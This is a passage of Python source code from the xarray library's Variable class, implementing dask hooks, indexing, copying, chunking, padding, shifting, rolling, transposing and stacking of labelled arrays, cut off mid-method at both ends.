# Use v.data, instead of v._data, in order to cope with the wrappers
# around NetCDF and the like
from dask.base import normalize_token
return normalize_token((type(self), self._dims, self.data, self._attrs))
def __dask_graph__(self):
if is_duck_dask_array(self._data):
return self._data.__dask_graph__()
else:
return None
def __dask_keys__(self):
return self._data.__dask_keys__()
def __dask_layers__(self):
return self._data.__dask_layers__()
@property
def __dask_optimize__(self):
return self._data.__dask_optimize__
@property
def __dask_scheduler__(self):
return self._data.__dask_scheduler__
def __dask_postcompute__(self):
array_func, array_args = self._data.__dask_postcompute__()
return self._dask_finalize, (array_func,) + array_args
def __dask_postpersist__(self):
array_func, array_args = self._data.__dask_postpersist__()
return self._dask_finalize, (array_func,) + array_args
def _dask_finalize(self, results, array_func, *args, **kwargs):
data = array_func(results, *args, **kwargs)
return Variable(self._dims, data, attrs=self._attrs, encoding=self._encoding)
@property
def values(self):
"""The variable's data as a numpy.ndarray"""
return _as_array_or_item(self._data)
@values.setter
def values(self, values):
self.data = values
def to_base_variable(self):
"""Return this variable as a base xarray.Variable"""
return Variable(
self.dims, self._data, self._attrs, encoding=self._encoding, fastpath=True
)
to_variable = utils.alias(to_base_variable, "to_variable")
def to_index_variable(self):
"""Return this variable as an xarray.IndexVariable"""
return IndexVariable(
self.dims, self._data, self._attrs, encoding=self._encoding, fastpath=True
)
to_coord = utils.alias(to_index_variable, "to_coord")
def _to_xindex(self):
# temporary function used internally as a replacement of to_index()
# returns an xarray Index instance instead of a pd.Index instance
return wrap_pandas_index(self.to_index())
def to_index(self):
"""Convert this variable to a pandas.Index"""
return self.to_index_variable().to_index()
def to_dict(self, data=True):
"""Dictionary representation of variable."""
item = {"dims": self.dims, "attrs": decode_numpy_dict_values(self.attrs)}
if data:
item["data"] = ensure_us_time_resolution(self.values).tolist()
else:
item.update({"dtype": str(self.dtype), "shape": self.shape})
return item
@property
def dims(self):
"""Tuple of dimension names with which this variable is associated."""
return self._dims
@dims.setter
def dims(self, value):
self._dims = self._parse_dimensions(value)
def _parse_dimensions(self, dims):
if isinstance(dims, str):
dims = (dims,)
dims = tuple(dims)
if len(dims) != self.ndim:
raise ValueError(
f"dimensions {dims} must have the same length as the "
f"number of data dimensions, ndim={self.ndim}"
)
return dims
def _item_key_to_tuple(self, key):
if utils.is_dict_like(key):
return tuple(key.get(dim, slice(None)) for dim in self.dims)
else:
return key
def _broadcast_indexes(self, key):
"""Prepare an indexing key for an indexing operation.
Parameters
----------
key : int, slice, array-like, dict or tuple of integer, slice and array-like
Any valid input for indexing.
Returns
-------
dims : tuple
Dimension of the resultant variable.
indexers : IndexingTuple subclass
Tuple of integer, array-like, or slices to use when indexing
self._data. The type of this argument indicates the type of
indexing to perform, either basic, outer or vectorized.
new_order : Optional[Sequence[int]]
Optional reordering to do on the result of indexing. If not None,
the first len(new_order) indexing should be moved to these
positions.
"""
key = self._item_key_to_tuple(key) # key is a tuple
# key is a tuple of full size
key = indexing.expanded_indexer(key, self.ndim)
# Convert a scalar Variable to an integer
key = tuple(
k.data.item() if isinstance(k, Variable) and k.ndim == 0 else k for k in key
)
# Convert a 0d-array to an integer
key = tuple(
k.item() if isinstance(k, np.ndarray) and k.ndim == 0 else k for k in key
)
if all(isinstance(k, BASIC_INDEXING_TYPES) for k in key):
return self._broadcast_indexes_basic(key)
self._validate_indexers(key)
# Detect it can be mapped as an outer indexer
# If all key is unlabeled, or
# key can be mapped as an OuterIndexer.
if all(not isinstance(k, Variable) for k in key):
return self._broadcast_indexes_outer(key)
# If all key is 1-dimensional and there are no duplicate labels,
# key can be mapped as an OuterIndexer.
dims = []
for k, d in zip(key, self.dims):
if isinstance(k, Variable):
if len(k.dims) > 1:
return self._broadcast_indexes_vectorized(key)
dims.append(k.dims[0])
elif not isinstance(k, integer_types):
dims.append(d)
if len(set(dims)) == len(dims):
return self._broadcast_indexes_outer(key)
return self._broadcast_indexes_vectorized(key)
def _broadcast_indexes_basic(self, key):
dims = tuple(
dim for k, dim in zip(key, self.dims) if not isinstance(k, integer_types)
)
return dims, BasicIndexer(key), None
def _validate_indexers(self, key):
"""Make sanity checks"""
for dim, k in zip(self.dims, key):
if not isinstance(k, BASIC_INDEXING_TYPES):
if not isinstance(k, Variable):
k = np.asarray(k)
if k.ndim > 1:
raise IndexError(
"Unlabeled multi-dimensional array cannot be "
"used for indexing: {}".format(k)
)
if k.dtype.kind == "b":
if self.shape[self.get_axis_num(dim)] != len(k):
raise IndexError(
"Boolean array size {:d} is used to index array "
"with shape {:s}.".format(len(k), str(self.shape))
)
if k.ndim > 1:
raise IndexError(
"{}-dimensional boolean indexing is "
"not supported. ".format(k.ndim)
)
if getattr(k, "dims", (dim,)) != (dim,):
raise IndexError(
"Boolean indexer should be unlabeled or on the "
"same dimension to the indexed array. Indexer is "
"on {:s} but the target dimension is {:s}.".format(
str(k.dims), dim
)
)
def _broadcast_indexes_outer(self, key):
dims = tuple(
k.dims[0] if isinstance(k, Variable) else dim
for k, dim in zip(key, self.dims)
if not isinstance(k, integer_types)
)
new_key = []
for k in key:
if isinstance(k, Variable):
k = k.data
if not isinstance(k, BASIC_INDEXING_TYPES):
k = np.asarray(k)
if k.size == 0:
# Slice by empty list; numpy could not infer the dtype
k = k.astype(int)
elif k.dtype.kind == "b":
(k,) = np.nonzero(k)
new_key.append(k)
return dims, OuterIndexer(tuple(new_key)), None
def _nonzero(self):
"""Equivalent numpy's nonzero but returns a tuple of Varibles."""
# TODO we should replace dask's native nonzero
# after https://github.com/dask/dask/issues/1076 is implemented.
nonzeros = np.nonzero(self.data)
return tuple(Variable((dim), nz) for nz, dim in zip(nonzeros, self.dims))
def _broadcast_indexes_vectorized(self, key):
variables = []
out_dims_set = OrderedSet()
for dim, value in zip(self.dims, key):
if isinstance(value, slice):
out_dims_set.add(dim)
else:
variable = (
value
if isinstance(value, Variable)
else as_variable(value, name=dim)
)
if variable.dtype.kind == "b": # boolean indexing case
(variable,) = variable._nonzero()
variables.append(variable)
out_dims_set.update(variable.dims)
variable_dims = set()
for variable in variables:
variable_dims.update(variable.dims)
slices = []
for i, (dim, value) in enumerate(zip(self.dims, key)):
if isinstance(value, slice):
if dim in variable_dims:
# We only convert slice objects to variables if they share
# a dimension with at least one other variable. Otherwise,
# we can equivalently leave them as slices aknd transpose
# the result. This is significantly faster/more efficient
# for most array backends.
values = np.arange(*value.indices(self.sizes[dim]))
variables.insert(i - len(slices), Variable((dim,), values))
else:
slices.append((i, value))
try:
variables = _broadcast_compat_variables(*variables)
except ValueError:
raise IndexError(f"Dimensions of indexers mismatch: {key}")
out_key = [variable.data for variable in variables]
out_dims = tuple(out_dims_set)
slice_positions = set()
for i, value in slices:
out_key.insert(i, value)
new_position = out_dims.index(self.dims[i])
slice_positions.add(new_position)
if slice_positions:
new_order = [i for i in range(len(out_dims)) if i not in slice_positions]
else:
new_order = None
return out_dims, VectorizedIndexer(tuple(out_key)), new_order
def __getitem__(self: VariableType, key) -> VariableType:
"""Return a new Variable object whose contents are consistent with
getting the provided key from the underlying data.
NB. __getitem__ and __setitem__ implement xarray-style indexing,
where if keys are unlabeled arrays, we index the array orthogonally
with them. If keys are labeled array (such as Variables), they are
broadcasted with our usual scheme and then the array is indexed with
the broadcasted key, like numpy's fancy indexing.
If you really want to do indexing like `x[x > 0]`, manipulate the numpy
array `x.values` directly.
"""
dims, indexer, new_order = self._broadcast_indexes(key)
data = as_indexable(self._data)[indexer]
if new_order:
data = np.moveaxis(data, range(len(new_order)), new_order)
return self._finalize_indexing_result(dims, data)
def _finalize_indexing_result(self: VariableType, dims, data) -> VariableType:
"""Used by IndexVariable to return IndexVariable objects when possible."""
return self._replace(dims=dims, data=data)
def _getitem_with_mask(self, key, fill_value=dtypes.NA):
"""Index this Variable with -1 remapped to fill_value."""
# TODO(shoyer): expose this method in public API somewhere (isel?) and
# use it for reindex.
# TODO(shoyer): add a sanity check that all other integers are
# non-negative
# TODO(shoyer): add an optimization, remapping -1 to an adjacent value
# that is actually indexed rather than mapping it to the last value
# along each axis.
if fill_value is dtypes.NA:
fill_value = dtypes.get_fill_value(self.dtype)
dims, indexer, new_order = self._broadcast_indexes(key)
if self.size:
if is_duck_dask_array(self._data):
# dask's indexing is faster this way; also vindex does not
# support negative indices yet:
# https://github.com/dask/dask/pull/2967
actual_indexer = indexing.posify_mask_indexer(indexer)
else:
actual_indexer = indexer
data = as_indexable(self._data)[actual_indexer]
mask = indexing.create_mask(indexer, self.shape, data)
# we need to invert the mask in order to pass data first. This helps
# pint to choose the correct unit
# TODO: revert after https://github.com/hgrecco/pint/issues/1019 is fixed
data = duck_array_ops.where(np.logical_not(mask), data, fill_value)
else:
# array cannot be indexed along dimensions of size 0, so just
# build the mask directly instead.
mask = indexing.create_mask(indexer, self.shape)
data = np.broadcast_to(fill_value, getattr(mask, "shape", ()))
if new_order:
data = duck_array_ops.moveaxis(data, range(len(new_order)), new_order)
return self._finalize_indexing_result(dims, data)
def __setitem__(self, key, value):
"""__setitem__ is overloaded to access the underlying numpy values with
orthogonal indexing.
See __getitem__ for more details.
"""
dims, index_tuple, new_order = self._broadcast_indexes(key)
if not isinstance(value, Variable):
value = as_compatible_data(value)
if value.ndim > len(dims):
raise ValueError(
f"shape mismatch: value array of shape {value.shape} could not be "
f"broadcast to indexing result with {len(dims)} dimensions"
)
if value.ndim == 0:
value = Variable((), value)
else:
value = Variable(dims[-value.ndim :], value)
# broadcast to become assignable
value = value.set_dims(dims).data
if new_order:
value = duck_array_ops.asarray(value)
value = value[(len(dims) - value.ndim) * (np.newaxis,) + (Ellipsis,)]
value = np.moveaxis(value, new_order, range(len(new_order)))
indexable = as_indexable(self._data)
indexable[index_tuple] = value
@property
def attrs(self) -> Dict[Hashable, Any]:
"""Dictionary of local attributes on this variable."""
if self._attrs is None:
self._attrs = {}
return self._attrs
@attrs.setter
def attrs(self, value: Mapping[Hashable, Any]) -> None:
self._attrs = dict(value)
@property
def encoding(self):
"""Dictionary of encodings on this variable."""
if self._encoding is None:
self._encoding = {}
return self._encoding
@encoding.setter
def encoding(self, value):
try:
self._encoding = dict(value)
except ValueError:
raise ValueError("encoding must be castable to a dictionary")
def copy(self, deep=True, data=None):
"""Returns a copy of this object.
If `deep=True`, the data array is loaded into memory and copied onto
the new object. Dimensions, attributes and encodings are always copied.
Use `data` to create a new object with the same structure as
original but entirely new data.
Parameters
----------
deep : bool, optional
Whether the data array is loaded into memory and copied onto
the new object. Default is True.
data : array_like, optional
Data to use in the new object. Must have same shape as original.
When `data` is used, `deep` is ignored.
Returns
-------
object : Variable
New object with dimensions, attributes, encodings, and optionally
data copied from original.
Examples
--------
Shallow copy versus deep copy
>>> var = xr.Variable(data=[1, 2, 3], dims="x")
>>> var.copy()
<xarray.Variable (x: 3)>
array([1, 2, 3])
>>> var_0 = var.copy(deep=False)
>>> var_0[0] = 7
>>> var_0
<xarray.Variable (x: 3)>
array([7, 2, 3])
>>> var
<xarray.Variable (x: 3)>
array([7, 2, 3])
Changing the data using the ``data`` argument maintains the
structure of the original object, but with the new data. Original
object is unaffected.
>>> var.copy(data=[0.1, 0.2, 0.3])
<xarray.Variable (x: 3)>
array([0.1, 0.2, 0.3])
>>> var
<xarray.Variable (x: 3)>
array([7, 2, 3])
See Also
--------
pandas.DataFrame.copy
"""
if data is None:
data = self._data
if isinstance(data, indexing.MemoryCachedArray):
# don't share caching between copies
data = indexing.MemoryCachedArray(data.array)
if deep:
data = copy.deepcopy(data)
else:
data = as_compatible_data(data)
if self.shape != data.shape:
raise ValueError(
"Data shape {} must match shape of object {}".format(
data.shape, self.shape
)
)
# note:
# dims is already an immutable tuple
# attributes and encoding will be copied when the new Array is created
return self._replace(data=data)
def _replace(
self: VariableType,
dims=_default,
data=_default,
attrs=_default,
encoding=_default,
) -> VariableType:
if dims is _default:
dims = copy.copy(self._dims)
if data is _default:
data = copy.copy(self.data)
if attrs is _default:
attrs = copy.copy(self._attrs)
if encoding is _default:
encoding = copy.copy(self._encoding)
return type(self)(dims, data, attrs, encoding, fastpath=True)
def __copy__(self):
return self.copy(deep=False)
def __deepcopy__(self, memo=None):
# memo does nothing but is required for compatibility with
# copy.deepcopy
return self.copy(deep=True)
# mutable objects should not be hashable
# https://github.com/python/mypy/issues/4266
__hash__ = None # type: ignore[assignment]
@property
def chunks(self):
"""Block dimensions for this array's data or None if it's not a dask
array.
"""
return getattr(self._data, "chunks", None)
_array_counter = itertools.count()
def chunk(self, chunks={}, name=None, lock=False):
"""Coerce this array's data into a dask arrays with the given chunks.
If this variable is a non-dask array, it will be converted to dask
array. If it's a dask array, it will be rechunked to the given chunk
sizes.
If neither chunks is not provided for one or more dimensions, chunk
sizes along that dimension will not be updated; non-dask arrays will be
converted into dask arrays with a single block.
Parameters
----------
chunks : int, tuple or dict, optional
Chunk sizes along each dimension, e.g., ``5``, ``(5, 5)`` or
``{'x': 5, 'y': 5}``.
name : str, optional
Used to generate the name for this array in the internal dask
graph. Does not need not be unique.
lock : optional
Passed on to :py:func:`dask.array.from_array`, if the array is not
already as dask array.
Returns
-------
chunked : xarray.Variable
"""
import dask.array as da
if chunks is None:
warnings.warn(
"None value for 'chunks' is deprecated. "
"It will raise an error in the future. Use instead '{}'",
category=FutureWarning,
)
chunks = {}
if utils.is_dict_like(chunks):
chunks = {self.get_axis_num(dim): chunk for dim, chunk in chunks.items()}
data = self._data
if is_duck_dask_array(data):
data = data.rechunk(chunks)
else:
if isinstance(data, indexing.ExplicitlyIndexed):
# Unambiguously handle array storage backends (like NetCDF4 and h5py)
# that can't handle general array indexing. For example, in netCDF4 you
# can do "outer" indexing along two dimensions independent, which works
# differently from how NumPy handles it.
# da.from_array works by using lazy indexing with a tuple of slices.
# Using OuterIndexer is a pragmatic choice: dask does not yet handle
# different indexing types in an explicit way:
# https://github.com/dask/dask/issues/2883
data = indexing.ImplicitToExplicitIndexingAdapter(
data, indexing.OuterIndexer
)
# All of our lazily loaded backend array classes should use NumPy
# array operations.
kwargs = {"meta": np.ndarray}
else:
kwargs = {}
if utils.is_dict_like(chunks):
chunks = tuple(chunks.get(n, s) for n, s in enumerate(self.shape))
data = da.from_array(data, chunks, name=name, lock=lock, **kwargs)
return self._replace(data=data)
def _as_sparse(self, sparse_format=_default, fill_value=dtypes.NA):
"""
use sparse-array as backend.
"""
import sparse
# TODO: what to do if dask-backended?
if fill_value is dtypes.NA:
dtype, fill_value = dtypes.maybe_promote(self.dtype)
else:
dtype = dtypes.result_type(self.dtype, fill_value)
if sparse_format is _default:
sparse_format = "coo"
try:
as_sparse = getattr(sparse, f"as_{sparse_format.lower()}")
except AttributeError:
raise ValueError(f"{sparse_format} is not a valid sparse format")
data = as_sparse(self.data.astype(dtype), fill_value=fill_value)
return self._replace(data=data)
def _to_dense(self):
"""
Change backend from sparse to np.array
"""
if hasattr(self._data, "todense"):
return self._replace(data=self._data.todense())
return self.copy(deep=False)
def isel(
self: VariableType,
indexers: Mapping[Hashable, Any] = None,
missing_dims: str = "raise",
**indexers_kwargs: Any,
) -> VariableType:
"""Return a new array indexed along the specified dimension(s).
Parameters
----------
**indexers : {dim: indexer, ...}
Keyword arguments with names matching dimensions and values given
by integers, slice objects or arrays.
missing_dims : {"raise", "warn", "ignore"}, default: "raise"
What to do if dimensions that should be selected from are not present in the
DataArray:
- "raise": raise an exception
- "warning": raise a warning, and ignore the missing dimensions
- "ignore": ignore the missing dimensions
Returns
-------
obj : Array object
A new Array with the selected data and dimensions. In general,
the new variable's data will be a view of this variable's data,
unless numpy fancy indexing was triggered by using an array
indexer, in which case the data will be a copy.
"""
indexers = either_dict_or_kwargs(indexers, indexers_kwargs, "isel")
indexers = drop_dims_from_indexers(indexers, self.dims, missing_dims)
key = tuple(indexers.get(dim, slice(None)) for dim in self.dims)
return self[key]
def squeeze(self, dim=None):
"""Return a new object with squeezed data.
Parameters
----------
dim : None or str or tuple of str, optional
Selects a subset of the length one dimensions. If a dimension is
selected with length greater than one, an error is raised. If
None, all length one dimensions are squeezed.
Returns
-------
squeezed : same type as caller
This object, but with with all or a subset of the dimensions of
length 1 removed.
See Also
--------
numpy.squeeze
"""
dims = common.get_squeeze_dims(self, dim)
return self.isel({d: 0 for d in dims})
def _shift_one_dim(self, dim, count, fill_value=dtypes.NA):
axis = self.get_axis_num(dim)
if count > 0:
keep = slice(None, -count)
elif count < 0:
keep = slice(-count, None)
else:
keep = slice(None)
trimmed_data = self[(slice(None),) * axis + (keep,)].data
if fill_value is dtypes.NA:
dtype, fill_value = dtypes.maybe_promote(self.dtype)
else:
dtype = self.dtype
width = min(abs(count), self.shape[axis])
dim_pad = (width, 0) if count >= 0 else (0, width)
pads = [(0, 0) if d != dim else dim_pad for d in self.dims]
data = duck_array_ops.pad(
trimmed_data.astype(dtype),
pads,
mode="constant",
constant_values=fill_value,
)
if is_duck_dask_array(data):
# chunked data should come out with the same chunks; this makes
# it feasible to combine shifted and unshifted data
# TODO: remove this once dask.array automatically aligns chunks
data = data.rechunk(self.data.chunks)
return self._replace(data=data)
def shift(self, shifts=None, fill_value=dtypes.NA, **shifts_kwargs):
"""
Return a new Variable with shifted data.
Parameters
----------
shifts : mapping of the form {dim: offset}
Integer offset to shift along each of the given dimensions.
Positive offsets shift to the right; negative offsets shift to the
left.
fill_value : scalar, optional
Value to use for newly missing values
**shifts_kwargs
The keyword arguments form of ``shifts``.
One of shifts or shifts_kwargs must be provided.
Returns
-------
shifted : Variable
Variable with the same dimensions and attributes but shifted data.
"""
shifts = either_dict_or_kwargs(shifts, shifts_kwargs, "shift")
result = self
for dim, count in shifts.items():
result = result._shift_one_dim(dim, count, fill_value=fill_value)
return result
def _pad_options_dim_to_index(
self,
pad_option: Mapping[Hashable, Union[int, Tuple[int, int]]],
fill_with_shape=False,
):
if fill_with_shape:
return [
(n, n) if d not in pad_option else pad_option[d]
for d, n in zip(self.dims, self.data.shape)
]
return [(0, 0) if d not in pad_option else pad_option[d] for d in self.dims]
def pad(
self,
pad_width: Mapping[Hashable, Union[int, Tuple[int, int]]] = None,
mode: str = "constant",
stat_length: Union[
int, Tuple[int, int], Mapping[Hashable, Tuple[int, int]]
] = None,
constant_values: Union[
int, Tuple[int, int], Mapping[Hashable, Tuple[int, int]]
] = None,
end_values: Union[
int, Tuple[int, int], Mapping[Hashable, Tuple[int, int]]
] = None,
reflect_type: str = None,
**pad_width_kwargs: Any,
):
"""
Return a new Variable with padded data.
Parameters
----------
pad_width : mapping of hashable to tuple of int
Mapping with the form of {dim: (pad_before, pad_after)}
describing the number of values padded along each dimension.
{dim: pad} is a shortcut for pad_before = pad_after = pad
mode : str, default: "constant"
See numpy / Dask docs
stat_length : int, tuple or mapping of hashable to tuple
Used in 'maximum', 'mean', 'median', and 'minimum'. Number of
values at edge of each axis used to calculate the statistic value.
constant_values : scalar, tuple or mapping of hashable to tuple
Used in 'constant'. The values to set the padded values for each
axis.
end_values : scalar, tuple or mapping of hashable to tuple
Used in 'linear_ramp'. The values used for the ending value of the
linear_ramp and that will form the edge of the padded array.
reflect_type : {"even", "odd"}, optional
Used in "reflect", and "symmetric". The "even" style is the
default with an unaltered reflection around the edge value. For
the "odd" style, the extended part of the array is created by
subtracting the reflected values from two times the edge value.
**pad_width_kwargs
One of pad_width or pad_width_kwargs must be provided.
Returns
-------
padded : Variable
Variable with the same dimensions and attributes but padded data.
"""
pad_width = either_dict_or_kwargs(pad_width, pad_width_kwargs, "pad")
# change default behaviour of pad with mode constant
if mode == "constant" and (
constant_values is None or constant_values is dtypes.NA
):
dtype, constant_values = dtypes.maybe_promote(self.dtype)
else:
dtype = self.dtype
# create pad_options_kwargs, numpy requires only relevant kwargs to be nonempty
if isinstance(stat_length, dict):
stat_length = self._pad_options_dim_to_index(
stat_length, fill_with_shape=True
)
if isinstance(constant_values, dict):
constant_values = self._pad_options_dim_to_index(constant_values)
if isinstance(end_values, dict):
end_values = self._pad_options_dim_to_index(end_values)
# workaround for bug in Dask's default value of stat_length https://github.com/dask/dask/issues/5303
if stat_length is None and mode in ["maximum", "mean", "median", "minimum"]:
stat_length = [(n, n) for n in self.data.shape] # type: ignore[assignment]
# change integer values to a tuple of two of those values and change pad_width to index
for k, v in pad_width.items():
if isinstance(v, numbers.Number):
pad_width[k] = (v, v)
pad_width_by_index = self._pad_options_dim_to_index(pad_width)
# create pad_options_kwargs, numpy/dask requires only relevant kwargs to be nonempty
pad_option_kwargs = {}
if stat_length is not None:
pad_option_kwargs["stat_length"] = stat_length
if constant_values is not None:
pad_option_kwargs["constant_values"] = constant_values
if end_values is not None:
pad_option_kwargs["end_values"] = end_values
if reflect_type is not None:
pad_option_kwargs["reflect_type"] = reflect_type # type: ignore[assignment]
array = duck_array_ops.pad(
self.data.astype(dtype, copy=False),
pad_width_by_index,
mode=mode,
**pad_option_kwargs,
)
return type(self)(self.dims, array)
def _roll_one_dim(self, dim, count):
axis = self.get_axis_num(dim)
count %= self.shape[axis]
if count != 0:
indices = [slice(-count, None), slice(None, -count)]
else:
indices = [slice(None)]
arrays = [self[(slice(None),) * axis + (idx,)].data for idx in indices]
data = duck_array_ops.concatenate(arrays, axis)
if is_duck_dask_array(data):
# chunked data should come out with the same chunks; this makes
# it feasible to combine shifted and unshifted data
# TODO: remove this once dask.array automatically aligns chunks
data = data.rechunk(self.data.chunks)
return self._replace(data=data)
def roll(self, shifts=None, **shifts_kwargs):
"""
Return a new Variable with rolld data.
Parameters
----------
shifts : mapping of hashable to int
Integer offset to roll along each of the given dimensions.
Positive offsets roll to the right; negative offsets roll to the
left.
**shifts_kwargs
The keyword arguments form of ``shifts``.
One of shifts or shifts_kwargs must be provided.
Returns
-------
shifted : Variable
Variable with the same dimensions and attributes but rolled data.
"""
shifts = either_dict_or_kwargs(shifts, shifts_kwargs, "roll")
result = self
for dim, count in shifts.items():
result = result._roll_one_dim(dim, count)
return result
def transpose(self, *dims) -> "Variable":
"""Return a new Variable object with transposed dimensions.
Parameters
----------
*dims : str, optional
By default, reverse the dimensions. Otherwise, reorder the
dimensions to this order.
Returns
-------
transposed : Variable
The returned object has transposed data and dimensions with the
same attributes as the original.
Notes
-----
This operation returns a view of this variable's data. It is
lazy for dask-backed Variables but not for numpy-backed Variables.
See Also
--------
numpy.transpose
"""
if len(dims) == 0:
dims = self.dims[::-1]
dims = tuple(infix_dims(dims, self.dims))
if len(dims) < 2 or dims == self.dims:
# no need to transpose if only one dimension
# or dims are in same order
return self.copy(deep=False)
axes = self.get_axis_num(dims)
data = as_indexable(self._data).transpose(axes)
return self._replace(dims=dims, data=data)
@property
def T(self) -> "Variable":
return self.transpose()
def set_dims(self, dims, shape=None):
"""Return a new variable with given set of dimensions.
This method might be used to attach new dimension(s) to variable.
When possible, this operation does not copy this variable's data.
Parameters
----------
dims : str or sequence of str or dict
Dimensions to include on the new variable. If a dict, values are
used to provide the sizes of new dimensions; otherwise, new
dimensions are inserted with length 1.
Returns
-------
Variable
"""
if isinstance(dims, str):
dims = [dims]
if shape is None and utils.is_dict_like(dims):
shape = dims.values()
missing_dims = set(self.dims) - set(dims)
if missing_dims:
raise ValueError(
f"new dimensions {dims!r} must be a superset of "
f"existing dimensions {self.dims!r}"
)
self_dims = set(self.dims)
expanded_dims = tuple(d for d in dims if d not in self_dims) + self.dims
if self.dims == expanded_dims:
# don't use broadcast_to unless necessary so the result remains
# writeable if possible
expanded_data = self.data
elif shape is not None:
dims_map = dict(zip(dims, shape))
tmp_shape = tuple(dims_map[d] for d in expanded_dims)
expanded_data = duck_array_ops.broadcast_to(self.data, tmp_shape)
else:
expanded_data = self.data[(None,) * (len(expanded_dims) - self.ndim)]
expanded_var = Variable(
expanded_dims, expanded_data, self._attrs, self._encoding, fastpath=True
)
return expanded_var.transpose(*dims)
def _stack_once(self, dims: List[Hashable], new_dim: Hashable):
if not set(dims) <= set(self.dims):
raise ValueError(f"invalid existing dimensions: {dims}")
if new_dim in self.dims:
raise ValueError(
"cannot create a new dimension with the same "
"name as an existing dimension"
)
if len(dims) == 0:
# don't stack
return self.copy(deep=False)
other_dims = [d for d in self.dims if d not in dims]
dim_order = other_dims + list(dims)
reordered = self.transpose(*dim_order)
new_shape = reordered.shape[: len(other_dims)] + (-1,)
new_data = reordered.data.reshape(new_shape)
new_dims = reordered.dims[: len(other_dims)] + (new_dim,)
return Variable(new_dims, new_data, self._attrs, self._encoding, fastpath=True)
def stack(self, dimensions=None, **dimensions_kwargs):
"""
Stack any number of existing dimensions into a single new dimension.
New dimensions will be added at the end, and the order of the data
along each new dimension will be in contiguous (C) order.
Parameters
----------
dimensions : mapping of hashable to tuple of hashable
Mapping of form new_name=(dim1, dim2, ...) describing the
names of new dimensions, and the existing dimensions that
they replace.
**dimensions_kwargs
The keyword arguments form of ``dimensions``.
One of dimensions or dimensions_kwargs must be provided.
Returns
-------
stacked : Variable
Variable with the same attributes but stacked data.
See Also
--------
Variable.unstack
"""
dimensions = either_dict_or_kwargs(dimensions, dimensions_kwargs, "stack")
result = self
for new_dim, dims in dimensions.items():
result = result._stack_once(dims, new_dim)
return result
def _unstack_once_full(
self, dims: Mapping[Hashable, int], old_dim: Hashable
) -> "Variable":
"""
Unstacks the variable without needing an index.
Unlike `_unstack_once`, this function requires the existing dimension to
contain the full product of the new dimensions.
"""
new_dim_names = tuple(dims.keys())
new_dim_sizes = tuple(dims.values())
if old_dim not in self.dims:
raise ValueError(f"invalid existing dimension: {old_dim}")
if set(new_dim_names).intersection(self.dims):
raise ValueError(
"cannot create a new dimension with the same "
"name as an existing dimension"
)
if np.prod(new_dim_sizes) != self.sizes[old_dim]:
raise ValueError(
"the product of the new dimension sizes must "
"equal the size of the old dimension"
)
other_dims = [d for d in self.dims if d != old_dim]
dim_order = other_dims + [old_dim]
reordered = self.transpose(*dim_order)
new_shape = reordered.shape[: len(other_dims)] + new_dim_sizes
new_data = reordered.data.reshape(new_shape)
new_dims = reordered.dims[: len(other_dims)] + new_dim_names
return Variable(new_dims, new_data, self._attrs, self._encoding, fastpath=True)
def _unstack_once(
self,
index: pd.MultiIndex,
dim: Hashable,
fill_value=dtypes.NA,
) -> "Variable":
"""
Unstacks this variable given an index to unstack and the name of the
dimension to which the index refers.
"""
reordered = self.transpose(..., dim)
new_dim_sizes = [lev.size for lev in index.levels]
new_dim_names = index.names
indexer = index.codes
# Potentially we could replace `len(other_dims)` with just `-1`
other_dims = [d for d in self.dims if d != dim]
new_shape = tuple(list(reordered.shape[: len(other_dims)]) + new_dim_sizes)
new_dims = reordered.dims[: len(other_dims)] + new_dim_names
if fill_value is dtypes.NA:
is_missing_values = np.prod(new_shape) > np.prod(self.shape)
if is_missing_values:
dtype, fill_value = dtypes.maybe_promote(self.dtype)
else:
dtype = self.dtype
fill_value = dtypes.get_fill_value(dtype)
else:
dtype = self.dtype
data = np.full_like(
self.data,
fill_value=fill_value,
shape=new_shape,
dtype=dtype,
)
# Indexer is a list of lists of locations. Each list is the locations
# on the new dimension. This is robust to the data being sparse; in that
# case the destinations will be NaN / zero.
# sparse doesn't support item assigment,
# https://github.com/pydata/sparse/issues/114
data[(..., *indexer)] = reordered
return self._replace(dims=new_dims, data=data)
def unstack(self, dimensions=None, **dimensions_kwargs):
"""
Unstack an existing dimension into multiple new dimensions.
New dimensions will be added at the end, and the order of the data
along each new dimension will be in contiguous (C) order.
Note that unlike ``DataArray.unstack`` and ``Dataset.unstack``, this
method requires the existing dimension to contain the full product of
the new dimensions.
Parameters
----------
dimensions : mapping of hashable to mapping of hashable to int
Mapping of the form old_dim={dim1: size1, ...} describing the
names of existing dimensions, and the new dimensions and sizes
that they map to.
**dimensions_kwargs
The keyword arguments form of ``dimensions``.
One of dimensions or dimensions_kwargs must be provided.
Returns
-------
unstacked : Variable
Variable with the same attributes but unstacked data.
See Also
--------
Variable.stack
DataArray.unstack
Dataset.unstack
"""
dimensions = either_dict_or_kwargs(dimensions, dimensions_kwargs, "unstack")
result = self
for old_dim, dims in dimensions.items():
result = result._unstack_once_full(dims, old_dim)
return result
def fillna(self, value):
return ops.fillna(self, value)
def where(self, cond, other=dtypes.NA):
return ops.where_method(self, cond, other)
def clip(self, min=None, max=None):
"""
Return an array whose values are limited to ``[min, max]``.
At least one of max or min must be given.
Refer to `numpy.clip` for full documentation.
See Also
--------
numpy.clip : equivalent function
"""
from .computation import apply_ufunc
return apply_ufunc(np.clip, self, min, max, dask="allowed")
def reduce(
self,
func,
dim=None,
axis=None,
keep_attrs=None,
keepdims=False,
**kwargs,
):
"""Reduce this array by applying `func` along some dimension(s).
Parameters
----------
func : callable
Function which can be called in the form
`func(x, axis=axis, **kwargs)` to return the result of reducing an
np.ndarray over an integer valued axis.
dim : str or sequence of str, optional
Dimension(s) over which to apply `func`.
axis : int or sequence of int, optional
Axis(es) over which to apply `func`. Only one of the 'dim'
and 'axis' arguments can be supplied. If neither are supplied, then
the reduction is calculated over the flattened array (by calling
`func(x)` without an axis argument).
keep_attrs : bool, optional
If True, the variable's attributes (`attrs`) will be copied from
the original object to the new one. If False (default), the new
object will be returned without attributes.
keepdims : bool, default: False
If True, the dimensions which are reduced are left in the result
as dimensions of size one
**kwargs : dict
Additional keyword arguments passed on to `func`.
Returns
-------
reduced : Array
Array with summarized data and the indicated dimension(s)
removed.
"""
if dim == ...:
dim = None
if dim is not None and axis is not None:
raise ValueError("cannot supply both 'axis' and 'dim' arguments")
if dim is not None:
axis = self.get_axis_num(dim)
with warnings.catch_warnings():
warnings.filterwarnings(
"ignore", r"Mean of empty slice", category=RuntimeWarning
)
if axis is not None:
data = func(self.data, axis=axis, **kwargs)
else:
data = func(self.data, **kwargs)
if getattr(data, "shape", ()) == self.shape:
dims = self.dims
else:
removed_axes = (
range(self.ndim) if axis is None else np.atleast_1d(axis) % self.ndim
)
